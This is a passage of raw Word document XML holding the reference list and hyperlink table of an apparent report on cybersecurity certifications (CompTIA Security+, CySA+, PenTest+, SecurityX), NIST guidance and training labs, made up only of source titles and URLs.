            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/blog/what-is-on-the-comptia-security-exam/</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Security Sy0-701 Exam Objectives (6 0) | PDF | Business | Computers - Scribd, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId90">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.scribd.com/document/775044881/CompTIA-Security-Sy0-701-Exam-Objectives-6-0</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Analyst+ (CySA+) Certification - CompTIA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId91">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/certifications/cybersecurity-analyst/</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CySA+ CS0-003 - Full Learning Guide - Artem Polynko, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId92">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://artempolynko.com/wp-content/uploads/2025/05/CompTIA-CySA-Guide.pdf</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Cybersecurity Analyst (CySA+) Certification Exam Objectives - TSTC - ICT &amp; Security Training, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId93">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.tstc.nl/assets/uploads/brochure498</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Differences Between CS0-002 and CS0-003 – What's New in the CySA+ Exam, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exam-labs.com/blog/key-differences-between-cs0-002-and-cs0-003-whats-new-in-the-cysa-exam</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CySA+ exam objectives: The 4 domains that will be covered - Infosec, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId95">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosecinstitute.com/resources/cysa/the-cysa-plus-knowledge-domains/</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CySA+ Study Guide: Exam CS0-003 [3 ed.] 1394182902, 9781394182909, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://dokumen.pub/comptia-cysa-study-guide-exam-cs0-003-3nbsped-1394182902-9781394182909-h-6334829.html</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CompTIA PenTest+ PT0-002 Exam Guide - EDUSUM, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId97">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.edusum.com/blog/complete-comptia-pentest-pt0-002-exam-guide</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PenTest+ Certification Exam Objectives - Minnesota Tech For Success, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId98">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://techforsuccess.org/wp-content/uploads/2024/06/comptia-pentest-pt0-002-exam-objectives-4-0.pdf</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PenTest+ Certification V3 (New Version) - CompTIA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId99">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/certifications/pentest/</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TryHackMe OWASP Juice Shop Walkthrough | by Fallen Angell - Medium, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId100">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@fallennangell36/tryhackme-owasp-juice-shop-walkthrough-b83bbcc1589b</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Pentest pt0 002 Exam Objectives (8 0) | PDF | Computer Network - Scribd, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.scribd.com/document/656169061/comptia-pentest-pt0-002-exam-objectives-8-0-eb87c7c7b9f34c8fa564002f690935d6-1</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Pentest (pt0 002) | PDF | Computer Network | Transport Layer Security - Scribd, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId102">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.scribd.com/document/732712386/Pentest-pt0-002</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PenTest+ (PenTest Plus) Exam Syllabus - EDUSUM, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId103">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.edusum.com/comptia/comptia-pentest-pentest-plus-exam-syllabus</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PenTest+ PT0-001 vs. PT0-002: What's the Difference?, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId104">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/blog/comptia-pentest-pt0-001-vs.-pt0-002-whats-the-difference-/</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CompTIA PenTest+: Your Questions Answered, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/blog/the-new-comptia-pentest-your-questions-answered/</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SecurityX CAS-005 (V5) — Practice Tests - Crucial Exams, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId106">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crucialexams.com/exams/comptia/securityx/cas-005/practice-tests-practice-questions</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SecurityX (formerly CASP+) Training Boot Camp - Infosec, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId107">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosecinstitute.com/courses/securityx-boot-camp/</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CompTIA SecurityX Certification Exam CAS-005 Practice Questions - CertsHero, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId108">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.certshero.com/comptia/cas-005/practice-test</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Using Bloom's and Webb's Taxonomies to Integrate Emerging Cybersecurity Topics into a Computing Curriculum - ResearchGate, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId109">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.researchgate.net/publication/305465099_Using_Bloom's_and_Webb's_Taxonomies_to_Integrate_Emerging_Cybersecurity_Topics_into_a_Computing_Curriculum</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Blending Bloom's Taxonomy and Serious Game Design - Secure Decisions, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId110">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://securedecisions.com/wp-content/uploads/pubs/SAM5062.pdf</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8 Best Virtual Cybersecurity Practice Labs - CloudShare, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId111">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cloudshare.com/blog/cybersecurity-practice-labs/</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Free Cyber Security Labs to Start Learning in 2025 - TryHackMe, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId112">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://tryhackme.com/resources/blog/best-free-cyber-security-labs-to-start-learning-in-2025</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Juice Shop, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId113">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/www-project-juice-shop/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vlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-160.pdf" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.rip/external/nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1-draft.pdf" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metricstream.com/blog/gtop-cyber-grc-trends-ai-it-ot-risk-continuous-compliance.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computer.org/csdl/magazine/sp/2016/04/msp2016040076/13rRUyY28WB" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qa.com/en-us/course-catalogue/courses/comptia-security-x-comsecx/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyberprotex.com/uploads/2/4/5/3/24530641/cas-004-qs-and-as-testking_1.pdf" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/courses/securityx-boot-camp/" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crucialexams.com/exams/comptia/securityx/cas-005/practice-tests-practice-questions" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/blog/the-new-comptia-pentest-your-questions-answered/" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/blog/comptia-pentest-pt0-001-vs.-pt0-002-whats-the-difference-/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.researchgate.net/publication/305465099_Using_Bloom's_and_Webb's_Taxonomies_to_Integrate_Emerging_Cybersecurity_Topics_into_a_Computing_Curriculum" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.certshero.com/comptia/cas-005/practice-test" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://risktrainingprofessionals.com/blog/2025/03/21/unlocking-the-power-of-iso-31000-a-strategic-guide-to-risk-management/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mdpi.com/2079-9292/11/14/2181" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://riskonnect.com/business-continuity-resilience/the-basics-of-iso-31000-risk-management/" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.edusum.com/comptia/comptia-pentest-pentest-plus-exam-syllabus" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scribd.com/document/732712386/Pentest-pt0-002" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scribd.com/document/656169061/comptia-pentest-pt0-002-exam-objectives-8-0-eb87c7c7b9f34c8fa564002f690935d6-1" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@fallennangell36/tryhackme-owasp-juice-shop-walkthrough-b83bbcc1589b" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.semanticscholar.org/paper/Lattice-based-access-control-models-Sandhu/25758a9bfedf24e4a1a0223e79aa048521427757" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://destcert.com/resources/information-security-models/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theknowledgeacademy.com/blog/togaf-vs-sabsa/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@samah.ikramfarez/understanding-security-models-bell-lapadula-biba-and-clark-wilson-d1b6a219da4a" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://conexiam.com/togaf-vs-sabsa/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.isaca.org/resources/isaca-journal/issues/2017/volume-4/enterprise-security-architecturea-top-down-approach" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/pubs/sp/800/160/v1/upd2/final" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://certstud.com/blog/togaf-vs-sabsa-architecture-certification-comparison-2025" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1.pdf" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/sites/default/files/all_files/1.ECSF.pdf" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://prepsaret.com/comptia/comptia-casp-domains-breakdown" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.isc2.org/Insights/2025/10/bridging-EU-cybersecurity-skills-gap-ECSF-and-certification-mapping" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/resources/securityx/securityx-frequently-asked-questions-faq/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/r/HotITCertNews/comments/1hawqci/cas004_vs_cas005_understand_them_and_make_a_clear/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@pkgmalinda/understanding-cybersecurity-architecture-and-access-control-models-a-comprehensive-guide-%EF%B8%8F-f80e4ba61ee5" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=io3fc4W_pkU" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.kent.edu/~rothstei/spring_13/papers/Lattice.pdf" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.techtarget.com/searchSecurity/downloads/29667C05.pdf" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://profsandhu.com/journals/computer/i93lbacm.pdf" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/resources/cysa/the-cysa-plus-knowledge-domains/" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exam-labs.com/blog/key-differences-between-cs0-002-and-cs0-003-whats-new-in-the-cysa-exam" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.edusum.com/blog/complete-comptia-pentest-pt0-002-exam-guide" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dokumen.pub/comptia-cysa-study-guide-exam-cs0-003-3nbsped-1394182902-9781394182909-h-6334829.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/certifications/pentest/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-juice-shop/" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techforsuccess.org/wp-content/uploads/2024/06/comptia-pentest-pt0-002-exam-objectives-4-0.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://certget.com/comptia-casp-cas-004-vs-securityx-cas-005/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/certifications/securityx/" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/certifications/cybersecurity-analyst/" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scribd.com/document/775044881/CompTIA-Security-Sy0-701-Exam-Objectives-6-0" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tstc.nl/assets/uploads/brochure498" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://artempolynko.com/wp-content/uploads/2025/05/CompTIA-CySA-Guide.pdf" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tstc.nl/assets/uploads/brochure497" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securedecisions.com/wp-content/uploads/pubs/SAM5062.pdf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecinstitute.com/resources/securityx/securityx-overview-of-domains/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.emerald.com/ics/article/doi/10.1108/ICS-08-2025-0336/1363089/A-Reward-Driven-bloom-s-taxonomy-framework-for" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ccecc.acm.org/files/publications/Blooms-for-Computing-20230119.pdf" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/sites/default/files/publications/European%20Cybersecurity%20Skills%20Framework%20User%20Manual.pdf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/ecsf-framework" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-juice-shop/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/resources/blog/best-free-cyber-security-labs-to-start-learning-in-2025" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudshare.com/blog/cybersecurity-practice-labs/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyote.inl.gov/content/uploads/24/2025/12/CyOTE-Case-Study_WannaCry.pdf" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/learning/security/ransomware/wannacry-ransomware/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/en-us/resources/stackables/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.csis.org/programs/strategic-technologies-program/significant-cyber-incidents" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.learnzapp.com/blog/comptia-certification-path/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 